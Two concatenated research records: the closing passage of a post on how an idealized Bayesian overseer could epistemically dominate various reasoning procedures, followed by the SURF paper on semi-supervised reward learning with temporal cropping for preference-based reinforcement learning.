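# A toy sketch of the argument above: a Bayesian that can compute
# P(observations | axioms) recovers trust in whatever axioms f was
# implicitly selected for.
priors = {"axioms_1": 0.5, "axioms_2": 0.5}

def likelihood(axioms, n_observations):
    # Stand-in for "following along with the deductive process used by f":
    # per-observation probability of the historical answers given the axioms.
    per_obs = {"axioms_1": 0.9, "axioms_2": 0.2}[axioms]
    return per_obs ** n_observations

n_obs = 20
unnormalized = {a: likelihood(a, n_obs) * p for a, p in priors.items()}
z = sum(unnormalized.values())
posterior = {a: v / z for a, v in unnormalized.items()}
print(posterior)  # essentially all mass on axioms_1, which explains the data
```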
**Modeling**
------------
Suppose *f* takes the following form:
* Given a question Q and context, set up a relevant physical situation.
* Use a dynamics model M to predict what will happen at some future time.
* Use the resulting state to answer Q.
We could say that **C** believes everything implied by the outcome of this physical simulation. We expect these beliefs to be accurate because *f* has predicted well in the past.
As in the deduction case, hopefully HCH can compute that P(observations|M is accurate) is high, since it can also compute the consequences of M. Then Bayes implies the dynamics model is accurate, and HCH can use that model to compute physical states.
Inferring all the beliefs from a dynamics model is not trivial though. As an extreme example, if *f* is performing an atom-by-atom simulation of a room, and that room contains Alice and Bob, then we could ascribe extensive beliefs about Alice and Bob to the computation **C**.
(Here we run head on into the fuzziness about what counts as a “reasonable” ascription procedure, but for the moment I’ll assume that some reasonable procedure ascribes beliefs about Alice and Bob to the computation.)
To compete with these ascriptions, HCH needs to infer those high-level beliefs about Alice and Bob from the low-level computation involving atoms. One way to do this is to search over possible “bridging” hypotheses that relate low-level physical facts to high-level facts about the environment. If such a hypothesis can explain additional high-level facts, then a Bayesian can learn that it is true. Similarly, if the bridging hypothesis relates facts about the model to constraints we know from the high-level interpretation, then the Bayesian can potentially use that as evidence. (This kind of reasoning will be discussed in a bit more detail in the next section.)
We could further hope that searching for a bridging hypothesis isn’t much harder than performing the original search over low-level physics, given that the low-level physics needed to explain a bunch of high-level facts and so already must encode some part of that correspondence.
(Note that the “deduction” example in the previous case could also involve alien concepts or models, in which case the same kind of work would be needed.)
**Alien reasoning**
-------------------
In the previous section we described two styles of reasoning we already understand. But there are probably many kinds of reasoning that work well in practice but that would be more alien, and those might be more challenging. This section will explore one example in some detail to try to help anchor our reasoning about the general phenomenon. It will also elaborate on some of the reasoning about “bridging” hypotheses mentioned in the last section.
Suppose that our predictions are always of the same form (e.g. what is the probability the stock market will go up today), and *f* works as follows (the details are long but not very important; a toy sketch follows the list):
* Find the PSD matrix A with maximum log determinant subject to the constraints in the next bullet points, then output the (0, 0) entry.
* There is an implicit correspondence between the rows/columns of A, and some uncertain properties X(0), X(1), X(2), …. (which we’ll view as 0–1 variables), where X(0) is the property we want to forecast.
* If the (*i*, *j*) entry of A represented the expectation E[X(*i*)X(*j*)], then the matrix would necessarily satisfy a bunch of constraints, which we impose on A. For example:
* If the context implies that X(*i*) = 1, then E[X(*i*)X(*j*)] = E[X(*j*)] = E[X(*j*)²], so A(*i*, *j*) = A(*j*, *j*).
* If X(*i*) and X(*j*) together imply X(*k*), then we must have E[X(*i*)X(*j*)] ≤ E[X(*i*)X(*k*)] and hence A(*i*, *j*) ≤ A(*i*, *k*).
* For any constants *a*, *b*, …, E[(*a* X(1) + *b* X(2) + … )²] ≥ 0 — i.e., the matrix A must be PSD.
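As a toy instance of this construction, here is a sketch using cvxpy (the problem size and the particular constraint choices are hypothetical; this illustrates the max-log-det idea rather than reproducing the exact procedure *f*):

```python
# A toy instance of the procedure above: maximize log det A over PSD
# matrices whose entries are constrained as if A(i, j) = E[X(i)X(j)]
# for 0-1 variables X(i). All numbers and constraints are illustrative.
import cvxpy as cp

n = 3                                # X(0) is the quantity to forecast
A = cp.Variable((n, n), PSD=True)    # PSD <=> E[(a'X)^2] >= 0 for all a

constraints = [cp.diag(A) <= 1, A >= 0]  # moments of 0-1 variables
# Suppose the context implies X(1) = 1: then E[X(1)X(j)] = E[X(j)^2] = A(j, j).
constraints += [A[1, j] == A[j, j] for j in range(n)]
# Suppose X(1) and X(2) together imply X(0): E[X(1)X(2)] <= E[X(1)X(0)].
constraints += [A[1, 2] <= A[1, 0]]

prob = cp.Problem(cp.Maximize(cp.log_det(A)), constraints)
prob.solve()
print("forecast for X(0):", A.value[0, 0])  # the (0, 0) entry f outputs
```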
The chosen matrix A(opt) corresponds to a set of beliefs about the propositions X(*i*), and we can ascribe these beliefs to **C**. Because *f* predicts well, we again expect these beliefs to say something important about the world.
I chose this procedure *f* in part because we can give a kind of argument for why the matrix A(opt) should tend to encode accurate beliefs. But I don’t think that a universal reasoner can make use of that argument:
* Finding the argument that *f* works is an additional problem, beyond finding *f* itself, which might be much harder.
* A comprehensible version of that argument may be much larger than the strategy itself, so even in the idealized cases like debate with perfect optimization, we may need to increase the scale.
* I don’t expect that all “good” reasoning strategies have clean understandable arguments in their favor (and even in this case, if the scheme worked well it would be largely an empirical fact rather than a consequence of the simple theorems we could prove). I think this kind of example is useful because we can easily imagine a human debate judge not having the argument while still being apparently universal. This makes it a useful analogy for cases where the argument really doesn’t exist.
Instead, I think a universal reasoner needs to be able to infer the efficacy of this reasoning procedure from its empirical success. It’s relatively easy for a Bayesian to learn the regularity “*f* makes good predictions.” Recovering the rest of the matrix A, and learning how to interpret it and whether to trust it, is the hard part.
This is going to require the same kind of bridging/identification we discussed in the last section. Let’s write X(A) for the set of beliefs about the world implied by the “intended” identification. Searching over possible identifications to find X (or something like it) is the only way we can ever relate the rows of A to the quantities X(*i*). Again, we can hope that it isn’t much harder than finding the original reasoning procedure.
I think that a sufficiently sophisticated Bayesian would probably be able to learn to trust X(A):
* If *f* is performing well enough that we think it’s more likely to be right in the future, then the Bayesian is going to end up believing some claim like “the predictions of *f* are good” (since it explains the data so well).
* This is a complicated statement, and without some kind of explanation this claim has a low prior probability (roughly decaying with the complexity of *f*). The Bayesian is motivated to find an explanation with higher prior probability.
* The correspondence X can explain the constraints on the matrix A, in terms of facts that we already know about the world. This explanation may end up being simpler (or at least higher prior) than a direct enumeration of the constraints on A — I hope (and think it’s plausible) that this happens iff we’d actually believe on reflection that X(A) captures reality.
(To the extent that we are uncertain and think A’s beliefs have a non-negligible chance of capturing reality, then hopefully we can capture that by the same mechanism by ending up with a non-degenerate posterior.)
* Now the Bayesian is faced with at least two kinds of explanations:
(a) “If you use the constraints implied by correspondence X(A) + positive semidefiniteness, and then optimize log det, you get a matrix A for which X(A) makes good predictions,”
(b) “The actual situation in the real world is described by positive semi-definite matrices with higher log determinant (under the correspondence X).”
* Explanation (b) is explaining two things at once: both why the optimization done by *f* respects the constraints on our beliefs, and why that optimization leads to good predictions. Hopefully this is simpler than making two separate bridging claims, one which explains *f* as respecting the constraints implied by X, and one which claims that *f* makes good predictions. Ideally, this 2-for-1 that favors (b) exactly mirrors the underlying reasoning that leads us to actually believe that X(A) is correct, rather than resembling what we know about reality and making good predictions “by coincidence.”
This is a pretty speculative discussion — it’s not very careful, and it’s hard to make it careful in part because I don’t have a formalization of Bayesian reasoning that can even really be applied to this setting. But it seems to match my intuitions about what reasonable Bayesian reasoning “should” do, which gives me a lot more optimism that a careful Bayesian would be able to epistemically dominate **C**.
**Deliberation and self-improvement**
-------------------------------------
Often we expect the computation **C** to have accurate beliefs because it uses a strategy that appears to work in practice — the last 3 examples have discussed that case. But there are other reasons to trust a computation.
For example, humans often write code and trust it (to some extent) even without extensive empirical testing — instead, we have a reason to think it will work, and need only modest testing to make sure that we haven’t made an error in our implementation or reasoning. If I write an automated mathematician that works by finding proofs that pass a proof checker, I don’t expect it to be correct because of the empirical record. (Empirical data backs up some key assumptions, but isn’t being used to directly establish the correctness of the method.)
Likewise, if we train a powerful agent, that agent might initially use strategies that work well in training, but over time it might use learned reasoning to identify other promising strategies and use those. Reasoning might allow it to totally skip empirical testing, or to adopt the method after much less testing than would have been necessary without the reasoning.
To dominate the beliefs produced by such reasoning, we can’t directly appeal to the kind of statistical inference made in the previous section. But in these cases I think we have access to an even more direct strategy.
Concretely, consider the situation where **C** contains a process *f* that designs a new reasoning process *g*. Then:
* From the outside, we trust *g* because we trust *f* and it trusts *g.*
* An otherwise-universal reasoner **A** will dominate *f*’s beliefs, and in particular if *f* is justified in thinking that *g* will work then **A** will believe that and understand why.
* Once we understand *f’*s beliefs, dominating *g* is essentially another instance of the original ascription universality problem, but now from a slightly stronger epistemic state that involves both what 𝔼 knows and what *f* knows. So unless our original approach to universality was tightly wedded to details of 𝔼, we can probably dominate *g*.
At the end of the day we’d like to put all of this together into a tight argument for universality, which will need to incorporate both statistical arguments and this kind of dynamic. But I’m tentatively optimistic about achieving universality in light of the prospect of agents designing new agents, and am much more worried about the kind of opaque computations that “just work” described in the last few sections. |
bcb6fda8-384d-46cf-80ad-02caa17b4a61 | StampyAI/alignment-research-dataset/arxiv | Arxiv | SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning.
1 Introduction
---------------
The reward function plays a crucial role in reinforcement learning (RL) to convey complex objectives to agents. For various applications where we can design an informative reward function, RL with deep neural networks has been used to solve a variety of sequential decision-making problems, including board games (alphago; alphazero), video games (mnih2015human; berner2019dota; alphastar), autonomous control (trpo; bellemare2020autonomous), and robotic manipulation (policy-search; robot-rl; qtopt; andrychowicz2020learning).
However, there are several issues in reward engineering.
First, designing a suitable reward function requires more human effort as the tasks become more complex.
For example, defining a reward function for book summarization (wu2021recursively) is non-trivial because it is hard to quantify the quality of a summary as a scalar value.
Also, it has been observed that RL agents can achieve high returns by discovering undesirable shortcuts if the hand-engineered reward does not fully specify the desired task (amodei2016concrete; hadfield2017inverse; pebble).
Furthermore, there are various domains, where a single ground-truth function does not exist, and thus personalization is required by modeling different reward functions based on the user’s preference.
Preference-based RL (akrour2011preference; preference\_drl; ibarz2018preference\_demo; pebble) provides an attractive alternative to avoid reward engineering.
Instead of assuming a hand-engineered reward function,
a (human) teacher provides preferences between two agent behaviors,
and an agent learns how to show the desired behavior by learning a reward function, which is consistent with the teacher’s preferences.
Recent progress of preference-based RL has shown that
the teacher can guide the agent to perform novel behaviors (preference\_drl; stiennon2020learning; wu2021recursively), and
mitigate the effects of reward exploitation (pebble).
However, existing preference-based approaches often suffer from expensive labeling costs, and this makes it hard to apply preference-based RL to various applications.
Meanwhile, in recent state-of-the-art systems in computer vision,
the label-efficiency problem has been successfully addressed through semi-supervised learning (SSL) approaches (berthelot2019mixmatch; berthelot2020remixmatch; sohn2020fixmatch; chen2020big).
By leveraging unlabeled datasets,
SSL methods have improved performance at low cost.
Data augmentation also plays a significant role in improving the performance of supervised learning methods (cubuk2018autoaugment; cubuk2019randaugment).
By using multiple augmented views of the same data as input,
the performance has been improved by learning augmentation-invariant representations.
Inspired by the impact of semi-supervised learning and data augmentation,
we present
SURF: a Semi-sUpervised Reward learning with data augmentation for Feedback-efficient preference-based RL.
To be specific, SURF consists of the following key ingredients:
1. Pseudo-labeling (lee2013pseudo; sohn2020fixmatch):
We leverage unlabeled data by utilizing the artificial labels generated by the learned preference predictor, which makes the reward function produce confident predictions (see Figure 3(a)).
We remark that such an SSL approach is particularly attractive in our setup, as an unlimited number of unlabeled samples can be obtained at no additional cost, i.e., from past experiences stored in the buffer.
2. Temporal cropping augmentation:
We generate slightly shifted or resized behaviors, which are expected to receive the same preference from a teacher, and utilize them for reward learning (see Figure 3(b)).
Our data augmentation technique enhances feedback-efficiency
by enforcing consistency (xie2019unsupervised; berthelot2020remixmatch; sohn2020fixmatch) on the reward function.
We remark that SURF is not a naïve application of these two techniques,
but a novel combination of semi-supervised learning and the proposed data augmentation, which has not been considered or evaluated in the context of preference-based RL (a minimal code sketch of both ingredients follows).
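To make the two ingredients concrete, here is a minimal PyTorch sketch (function and variable names are ours, not from the paper); it assumes a reward model that maps a segment of shape (T, obs_dim) to per-step rewards:

```python
# A minimal sketch of SURF's two ingredients: a Bradley-Terry preference
# predictor built from a learned reward model, confidence-thresholded
# pseudo-labeling, and temporal cropping of segment pairs.
import torch

def predict_preference(reward_net, seg0, seg1):
    # P_psi[seg0 > seg1]: softmax over the summed predicted rewards of the
    # two segments (the standard Bradley-Terry model in preference-based RL).
    r0 = reward_net(seg0).sum()
    r1 = reward_net(seg1).sum()
    return torch.softmax(torch.stack([r0, r1]), dim=0)

def pseudo_label(reward_net, seg0, seg1, tau=0.95):
    # Label an unlabeled segment pair only when the predictor is confident.
    with torch.no_grad():
        p = predict_preference(reward_net, seg0, seg1)
    if p.max().item() < tau:
        return None                      # discard low-confidence pairs
    return int(p.argmax().item())        # hard pseudo-label in {0, 1}

def temporal_crop(seg0, seg1, min_len=45, max_len=55):
    # Crop a random contiguous subsequence from each segment; the cropped
    # pair is assumed to inherit the preference label of the original pair.
    def crop(seg):
        length = min(int(torch.randint(min_len, max_len + 1, (1,))), len(seg))
        start = int(torch.randint(0, len(seg) - length + 1, (1,)))
        return seg[start:start + length]
    return crop(seg0), crop(seg1)
```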
Our experiments demonstrate that
SURF significantly improves the preference-based RL method (pebble) on complex locomotion and robotic manipulation tasks from DeepMind Control Suite (dmcontrol\_old; dmcontrol\_new) and Meta-world (yu2020meta), in terms of feedback-efficiency.
In particular, our framework enables RL agents to achieve a success rate of ∼100% on a complex robotic manipulation task using only a few hundred preference queries, while the baseline method only achieves a ∼50% success rate under the same conditions (see Figure 10).
Furthermore, we show that SURF can improve the performance of preference-based RL algorithms when we operate on high-dimensional and partially-observable inputs.
2 Related work
---------------
Preference-based RL.
In the preference-based RL framework,
a (human) supervisor provides preferences between the two agent behaviors
and the agent uses this feedback to perform the task (preference\_drl; ibarz2018preference\_demo; leike2018scalable; stiennon2020learning; wu2021recursively; pebble; lee2021bpref).
Since this approach is only feasible if the feedback is practical for a human to provide,
several strategies have been studied in the literature.
ibarz2018preference\_demo initialized the agent’s policy with imitation learning from the expert demonstrations,
while pebble utilized unsupervised pre-training for policy initialization.
Several sampling schemes (sadigh2017active; biyik2018batch; biyik2020active) that select informative queries have also been adopted to improve feedback-efficiency.
Our approach differs in that we
utilize unlabeled samples for reward learning, and also provide
a novel data augmentation technique for the agent behaviors.
Data augmentation for RL.
In the context of RL,
data augmentation has been widely investigated for improving data-efficiency (srinivas2020curl; yarats2021image), or RL generalization (cobbe2019quantifying; lee2019network).
For example, RAD (laskin2020reinforcement) demonstrated that data augmentation, such as random crop,
can improve both data-efficiency and generalization of RL algorithms.
While these methods are known to be beneficial for learning a policy in the standard RL setup,
they have not been tested for learning *rewards*.
To the best of our knowledge, we present the first
data augmentation method specifically designed for learning reward functions.
Semi-supervised learning.
The goal of
semi-supervised learning (SSL) is to leverage unlabeled samples to improve a model’s
performance when labeled samples are limited.
In an attempt to leverage the information in the unlabeled dataset, a number of techniques have been proposed, e.g., entropy minimization (grandvalet2005semi; lee2013pseudo) and consistency regularization (sajjadi2016regularization; miyato2018virtual; xie2019unsupervised; sohn2020fixmatch).
Recently, the combination of these two approaches has shown state-of-the-art performance on benchmarks, e.g., MixMatch (berthelot2019mixmatch) and ReMixMatch (berthelot2020remixmatch), when used with advanced
data augmentation techniques (zhang2017mixup; cubuk2019randaugment).
Specifically,
FixMatch (sohn2020fixmatch) revisits the pseudo-labeling technique
and demonstrates that
the joint use of pseudo-labels and consistency regularization achieves remarkable performance despite its simplicity.
Figure 3: Overview of SURF.
(a) We leverage unlabeled experiences by generating pseudo-labels $\hat y$ from the preference predictor $P_\psi$ in Eq. (1).
To mitigate the negative effects of incorrect pseudo-labels in this semi-supervised learning,
we only utilize pseudo-labels when the confidence of the predictor is higher than a threshold $\tau$.
(b) Given two segments $(\sigma^0,\sigma^1)$, we generate augmented segments $(\hat\sigma^0,\hat\sigma^1)$ by cropping a subsequence from each segment.
3 Preliminaries
----------------
Reinforcement learning (RL) is a framework where
an agent interacts with an environment in discrete time (sutton2018reinforcement).
At each timestep $t$, the agent receives a state $s_t$ from the environment and chooses an action $a_t$ based on its policy $\pi(a_t|s_t)$.
In the conventional RL framework,
the environment returns a reward $r(s_t,a_t)$
and the agent transitions to the next state $s_{t+1}$.
The return $R_t=\sum_{k=0}^{\infty}\gamma^k r(s_{t+k},a_{t+k})$ is defined as the discounted cumulative sum of rewards
with discount factor $\gamma\in[0,1)$.
The goal of the agent is to learn a policy that maximizes the expected return.
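As a concrete illustration, the return is just a discounted sum; a minimal sketch in Python (the function name is ours, not from the paper):

```python
def discounted_return(rewards, gamma=0.99):
    """Compute R_t = sum_k gamma^k * r_{t+k}, starting at t = 0."""
    return sum(gamma ** k * r for k, r in enumerate(rewards))

# Example: three steps of reward 1.0 with gamma = 0.9
print(discounted_return([1.0, 1.0, 1.0], gamma=0.9))  # 1 + 0.9 + 0.81 = 2.71
```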
Preference-based reinforcement learning.
In this paper,
we consider a preference-based RL framework, which does not assume the existence of a hand-engineered reward.
Instead, a (human) teacher provides preferences between the agent’s behaviors,
and the agent uses this feedback to perform the task (preference\_drl; ibarz2018preference\_demo; leike2018scalable; stiennon2020learning; pebble; lee2021bpref; wu2021recursively) by learning a reward function that is consistent with the observed preferences.
We formulate a reward learning problem as a supervised learning problem (wilson2012bayesian; preference\_drl).
Formally, a segment $\sigma$ is a sequence of observations and actions $\{(s_k,a_k),\dots,(s_{k+H-1},a_{k+H-1})\}$.
Given a pair of segments $(\sigma^0,\sigma^1)$,
a teacher gives feedback indicating which segment is preferred, i.e.,
$y\in\{0,1,0.5\}$, where $y=1$ indicates $\sigma^1\succ\sigma^0$, $y=0$ indicates $\sigma^0\succ\sigma^1$, and $y=0.5$ implies an equally preferable case.
Each feedback is stored in a dataset $\mathcal{D}$ as a triple $(\sigma^0,\sigma^1,y)$.
Then,
we model a preference predictor using the reward function $\hat r_\psi$ following the Bradley-Terry model (bradley1952rank):

$$P_\psi[\sigma^1\succ\sigma^0]=\frac{\exp\big(\sum_t \hat r_\psi(s_t^1,a_t^1)\big)}{\sum_{i\in\{0,1\}}\exp\big(\sum_t \hat r_\psi(s_t^i,a_t^i)\big)},\tag{1}$$

where $\sigma^i\succ\sigma^j$ denotes the event that segment $i$ is preferable to segment $j$.
The underlying assumption of this model is that
the teacher’s probability of preferring a segment depends exponentially on the accumulated sum of the reward over the segment.
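To make this concrete, the predictor in Eq. (1) is a two-way softmax over summed segment rewards. A minimal sketch (the function and argument names are ours; each segment is assumed to be a list of (state, action) pairs):

```python
import numpy as np

def preference_prob(reward_fn, seg0, seg1):
    """P_psi[sigma^1 > sigma^0] under the Bradley-Terry model of Eq. (1)."""
    r0 = sum(reward_fn(s, a) for s, a in seg0)  # summed reward of segment 0
    r1 = sum(reward_fn(s, a) for s, a in seg1)  # summed reward of segment 1
    m = max(r0, r1)  # shift for numerical stability (log-sum-exp trick)
    e0, e1 = np.exp(r0 - m), np.exp(r1 - m)
    return e1 / (e0 + e1)
```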
The reward model is trained through supervised learning with teacher’s preferences.
Specifically, given a dataset of preferences $\mathcal{D}$,
the reward function is updated by minimizing the binary cross-entropy loss:

$$\mathcal{L}^{\mathtt{CE}}=\mathbb{E}_{(\sigma^0,\sigma^1,y)\sim\mathcal{D}}\big[\mathcal{L}^{\mathtt{Reward}}\big]=-\mathbb{E}_{(\sigma^0,\sigma^1,y)\sim\mathcal{D}}\Big[(1-y)\log P_\psi[\sigma^0\succ\sigma^1]+y\log P_\psi[\sigma^1\succ\sigma^0]\Big].$$
The reward function $\hat r_\psi$ is usually optimized using only labels from real humans, which are expensive to obtain in practice. Instead, we propose a simple yet effective method based on semi-supervised learning and data augmentation to improve the feedback-efficiency of preference-based learning.
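For reference, the per-pair loss term $\mathcal{L}^{\mathtt{Reward}}$ can be sketched as follows, reusing the `preference_prob` function from the sketch above (the `eps` clamp is our addition for numerical safety):

```python
import numpy as np

def reward_loss(reward_fn, seg0, seg1, y, eps=1e-8):
    """Binary cross-entropy loss for one labeled segment pair.

    y = 1 means sigma^1 is preferred, y = 0 means sigma^0 is preferred,
    and y = 0.5 encodes an equally preferable pair.
    """
    p1 = preference_prob(reward_fn, seg0, seg1)  # P_psi[sigma^1 > sigma^0]
    p0 = 1.0 - p1
    return -((1.0 - y) * np.log(p0 + eps) + y * np.log(p1 + eps))
```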
Input: unlabeled batch ratio $\mu$, threshold parameter $\tau$, and loss weight $\lambda$
Input: set of collected labeled data $\mathcal{D}_l$ and unlabeled data $\mathcal{D}_u$
for each gradient step do
  Sample labeled batch $\{(\sigma_l^0,\sigma_l^1,y)^{(i)}\}_{i=1}^{B}\sim\mathcal{D}_l$
  Sample unlabeled batch $\{(\sigma_u^0,\sigma_u^1)^{(j)}\}_{j=1}^{\mu B}\sim\mathcal{D}_u$
  // Data augmentation for labeled data
  for $i$ in $1\dots B$ do
    $(\hat\sigma_l^0,\hat\sigma_l^1)^{(i)}\leftarrow\mathtt{TDA}\big((\sigma_l^0,\sigma_l^1)^{(i)}\big)$ in Algorithm 2
  end for
  // Pseudo-labeling and data augmentation for unlabeled data
  for $j$ in $1\dots\mu B$ do
    Predict pseudo-label $\hat y\big((\sigma_u^0,\sigma_u^1)^{(j)}\big)$
    $(\hat\sigma_u^0,\hat\sigma_u^1)^{(j)}\leftarrow\mathtt{TDA}\big((\sigma_u^0,\sigma_u^1)^{(j)}\big)$ in Algorithm 2
  end for
  Optimize $\mathcal{L}^{\mathtt{SSL}}$ in Eq. (3) with respect to $\psi$
end for
Algorithm 1 SURF
4 SURF
-------
In this section, we present
SURF: a Semi-sUpervised Reward learning with data augmentation for Feedback-efficient preference-based RL,
which can be used in conjunction with any existing preference-based RL method.
Our main idea is to leverage a large number of unlabeled samples collected from environments for reward learning, by inferring pseudo-labels.
To further increase the effective number of training samples, we propose a new data augmentation that temporally crops the subsequence of the agent behaviors.
The full procedure of our unified framework is summarized in Algorithm 1 (see Figure 3 for an overview of our method).
### 4.1 Semi-supervised reward learning
To improve the feedback efficiency,
we propose a semi-supervised learning (SSL) method for leveraging unlabeled experiences in the buffer for reward learning.
In addition to a *labeled dataset* $\mathcal{D}_l=\{(\sigma_l^0,\sigma_l^1,y)^{(i)}\}_{i=1}^{N_l}$,
we utilize an *unlabeled dataset* $\mathcal{D}_u=\{(\sigma_u^0,\sigma_u^1)^{(i)}\}_{i=1}^{N_u}$ to optimize the reward model $\hat r_\psi$. (The unlabeled dataset $\mathcal{D}_u$ is not constrained to a fixed size, since one can collect unlabeled samples flexibly by sampling arbitrary pairs of experiences from the buffer.)
Specifically,
we generate artificial labels $\hat y$ by *pseudo-labeling* (lee2013pseudo; sohn2020fixmatch) for the unlabeled dataset $\mathcal{D}_u$.
We infer a preference label $\hat y$ for an unlabeled segment pair $(\sigma_u^0,\sigma_u^1)$ as the class with higher predicted probability:

$$\hat y(\sigma_u^0,\sigma_u^1)=\begin{cases}0, & \text{if } P_\psi[\sigma_u^0\succ\sigma_u^1]>0.5,\\ 1, & \text{otherwise.}\end{cases}\tag{2}$$
By generating labels from the prediction model,
we can obtain free supervision for optimizing our reward model.
However, pseudo-labels from low-confidence predictions can be inaccurate,
and such noisy feedback can significantly degrade the performance of preference-based learning (lee2021bpref).
To filter out inaccurate pseudo-labels,
we only use unlabeled samples for training when the confidence of the predictor is higher than a pre-defined threshold (rosenberg2005semi).
Then the reward model $\hat r_\psi$ is optimized by minimizing the following objective:

$$\mathcal{L}^{\mathtt{SSL}}=\mathbb{E}_{(\sigma_l^0,\sigma_l^1,y)\sim\mathcal{D}_l,\,(\sigma_u^0,\sigma_u^1)\sim\mathcal{D}_u}\Big[\mathcal{L}^{\mathtt{Reward}}(\sigma_l^0,\sigma_l^1,y)+\lambda\cdot\mathcal{L}^{\mathtt{Reward}}(\sigma_u^0,\sigma_u^1,\hat y)\cdot\mathbb{1}\big(P_\psi[\sigma_u^{k^*}\succ\sigma_u^{1-k^*}]>\tau\big)\Big],\tag{3}$$

where $k^*=\operatorname{argmax}_{j\in\{0,1\}}\hat y(j)$ is the index of the preferred segment under the pseudo-label,
$\lambda$ is a hyperparameter that balances the losses,
and $\tau$ is a confidence threshold.
Training with the pseudo-labels encourages the model to output more confident predictions on unlabeled samples.
This can be seen as a form of entropy minimization (grandvalet2005semi), which is essential to the success of recent SSL methods (berthelot2019mixmatch; berthelot2020remixmatch).
The entropy minimization can improve the reward learning by forcing the preference predictor to be low-entropy (i.e., high-confidence) on unlabeled samples.
During training,
we sample a minibatch of unlabeled samples that is larger than the labeled one by a factor of $\mu$, following sohn2020fixmatch,
since unlabeled samples with low confidence are dropped within the minibatch.
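Putting Eq. (2) and Eq. (3) together, here is a minimal sketch of the semi-supervised objective, reusing `preference_prob` and `reward_loss` from the sketches above (the batch-mean normalization is our choice; the paper writes the objective as an expectation):

```python
def pseudo_label(reward_fn, seg0, seg1):
    """Eq. (2): label the pair with the more probable class.

    Returns (y_hat, confidence), where confidence is the predicted
    probability of the chosen class.
    """
    p1 = preference_prob(reward_fn, seg0, seg1)  # P[sigma^1 > sigma^0]
    if p1 < 0.5:
        return 0.0, 1.0 - p1
    return 1.0, p1

def ssl_loss(reward_fn, labeled, unlabeled, lam=1.0, tau=0.99):
    """Eq. (3): supervised loss plus confidence-filtered pseudo-label loss."""
    sup = sum(reward_loss(reward_fn, s0, s1, y) for s0, s1, y in labeled)
    sup /= max(len(labeled), 1)
    unsup = 0.0
    for s0, s1 in unlabeled:
        y_hat, conf = pseudo_label(reward_fn, s0, s1)
        if conf > tau:  # the indicator 1(P > tau) in Eq. (3)
            unsup += reward_loss(reward_fn, s0, s1, y_hat)
    unsup /= max(len(unlabeled), 1)
    return sup + lam * unsup
```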
### 4.2 Temporal data augmentation for reward learning
To further improve the feedback-efficiency in preference-based RL,
we propose a new data augmentation technique specially designed for reward learning.
Specifically,
for a given pair of segments and preference $(\sigma^0,\sigma^1,y)$,
we generate augmented segments $(\hat\sigma^0,\hat\sigma^1,y)$ by cropping a subsequence from each segment (see Algorithm 2 for more details). (The length of the cropped segments is sampled randomly across the batch but is the same within a segment pair, because the preference predictor uses the accumulated sum of the reward over time.)
Then, we utilize the augmented samples $(\hat\sigma^0,\hat\sigma^1)$ to optimize the cross-entropy loss in Eq. (3).
The intuition behind the augmentation is that
for a given pair of behavior clips,
the human teacher may keep their relative preferences for
slightly shifted or resized versions of them.
In the context of SSL,
data augmentation
is also related to
consistency regularization (xie2019unsupervised; sohn2020fixmatch) approaches
that train the model to output similar predictions on augmented versions of the same sample.
Namely, this *temporal cropping* method enables our framework to also enjoy the benefits of consistency regularization.
Input: minimum and maximum lengths $H_{\min}$ and $H_{\max}$, respectively, for cropping
Input: pair of segments $(\sigma^0,\sigma^1)$ with length $H$, where
  $\sigma^0=\{(s_0^0,a_0^0),\dots,(s_{H-1}^0,a_{H-1}^0)\}$
  $\sigma^1=\{(s_0^1,a_0^1),\dots,(s_{H-1}^1,a_{H-1}^1)\}$
Sample $H'$ from the range $[H_{\min},H_{\max}]$
Sample $k_0$, $k_1$ from the range $[0,H-H']$
// Randomly crop a subsequence of length $H'$ from each segment
$\hat\sigma^0\leftarrow\{(s_{k_0}^0,a_{k_0}^0),\dots,(s_{k_0+H'-1}^0,a_{k_0+H'-1}^0)\}$
$\hat\sigma^1\leftarrow\{(s_{k_1}^1,a_{k_1}^1),\dots,(s_{k_1+H'-1}^1,a_{k_1+H'-1}^1)\}$
Return $(\hat\sigma^0,\hat\sigma^1)$
Algorithm 2 TDA: Temporal data augmentation for reward learning
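A direct Python rendering of Algorithm 2, assuming each segment is a list of (state, action) pairs and that $H_{\max}\le H$ (function and variable names are ours):

```python
import random

def temporal_crop(seg0, seg1, h_min, h_max):
    """TDA (Algorithm 2): crop a random subsequence of shared length."""
    H = len(seg0)
    h = random.randint(h_min, h_max)  # shared crop length H'
    k0 = random.randint(0, H - h)     # independent start index for segment 0
    k1 = random.randint(0, H - h)     # independent start index for segment 1
    return seg0[k0:k0 + h], seg1[k1:k1 + h]
```

Note that the crop length is shared between the two segments while the start indices are drawn independently, matching the rationale above.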
5 Experiments
--------------
We design our experiments to investigate the following:
1. How does SURF improve the existing preference-based RL method in terms of feedback-efficiency?
2. What is the contribution of each of the proposed components in SURF?
3. How does the number of queries affect the performance of SURF?
4. Is temporal cropping better than existing state-based data augmentation methods in terms of feedback-efficiency?
5. Can SURF improve the performance of preference-based RL methods when we operate on high-dimensional and partially-observable inputs?
### 5.1 Setups
We evaluate SURF on several complex robotic manipulation and locomotion tasks
from Meta-world (yu2020meta) and DeepMind Control Suite (DMControl; dmcontrol\_old; dmcontrol\_new), respectively.
Similar to prior works (preference\_drl; pebble; lee2021bpref), in order to systematically evaluate performance, we consider a scripted teacher that provides preferences between two trajectory segments according to the underlying reward function. (While utilizing preferences from a human teacher is ideal, doing so makes it hard to evaluate algorithms quantitatively and quickly.)
Since the preferences of the scripted teacher exactly reflect the ground-truth reward of the environment,
one can evaluate the algorithms quantitatively by measuring the true return.
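One simple way such a scripted teacher can be realized is to label each pair by its ground-truth return; this is our illustrative sketch, and the cited papers may handle ties or segment weighting differently:

```python
def scripted_teacher(true_reward, seg0, seg1):
    """Label a segment pair using the environment's ground-truth reward."""
    r0 = sum(true_reward(s, a) for s, a in seg0)
    r1 = sum(true_reward(s, a) for s, a in seg1)
    if r0 == r1:
        return 0.5  # equally preferable
    return 1.0 if r1 > r0 else 0.0
```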
We remark that SURF can be combined with any preference-based RL algorithms by replacing the reward learning procedure of its backbone method.
In our experiments, we choose a state-of-the-art approach, PEBBLE (pebble), as our backbone algorithm.
Since PEBBLE utilizes the SAC (sac) algorithm to learn the policy,
we also compare to SAC using the ground-truth reward directly, as an upper bound for PEBBLE and our method.
We note that our goal is not to outperform SAC,
but rather to approach its performance using as few preference queries as possible.
[Figure 10 panels: (a) Hammer, (b) Door Open, (c) Button Press, (d) Sweep Into, (e) Drawer Open, (f) Window Open]
